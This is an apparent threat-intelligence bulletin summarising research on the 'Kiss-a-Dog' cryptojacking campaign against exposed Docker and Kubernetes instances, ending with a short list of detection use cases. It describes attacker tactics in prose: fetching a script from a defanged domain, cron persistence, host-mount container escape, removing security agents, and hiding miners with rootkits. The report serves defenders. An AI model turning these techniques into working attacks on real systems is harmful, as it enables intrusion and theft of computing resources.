Vulnerable Containers Targeted in New, Kiss-a-Dog Cryptojacking Campaign
Category: Threat Actor Activity | Industry: N/A | Level: Tactical | Source: CrowdStrike
A new cryptojacking campaign, named 'New Kiss-a-Dog' found on the operator's domains has been discovered by CrowdStrike researchers targeting Docker and Kubernetes infrastructure. "Called “Kiss-a-dog, the campaign used multiple command-and-control (C2) servers to launch attacks that attempted to mine cryptocurrency, utilize user and kernel mode rootkits to hide the activity, backdoor compromised containers, move laterally in the network and gain persistence." The campaign was detected in CrowdStrike’s honeypots in September 2022, as threat actors exploited misconfigured Docker instances to download and execute a script from the attacker's domain, kiss[.]a-dog[.]top. For persistence, a malicious payload is added as a cron job on the compromised system. To escape the container, the attacker uses 'host mount' to mount their host's volume over the container. "The technique itself is not new and seems to be common among cryptominers as an attempt to break out of containers. This is attributed to a lack of innovation by attackers and at the same time speaks to the vast and easy Docker attack surface exposed and available on the internet." A scan of exposed instances on Shodan by CrowdStrike discovered 13,327 exposed Docker instances and 68,151 exposed Kubernetes instances. Security agents present on the containers were uninstalled to evade detection. This made it easier for the attackers to launch their rootkits Diamorphine and libprocesshide, which are capable of hiding processes from the user. Additional stealth tactics were used in their files, as "the Kiss-a-dog campaign chose to encode the C/C++ code files and embed as a Base64 string into the script." The attacker’s objective was completed with the execution of a cryptocurrency miner such as XMRig. The tactics, techniques, and procedures (TTPs) used in this attack along with other Docker campaigns tracked by CrowdStrike, are similar to those used by the threat group, TeamTNT.
- Docker API Abuse & Container Created
Anvilogic Use Cases:
- Rare shell script execution
- Publicly exposed Docker API
- Kubernetes Potential Cyrptomining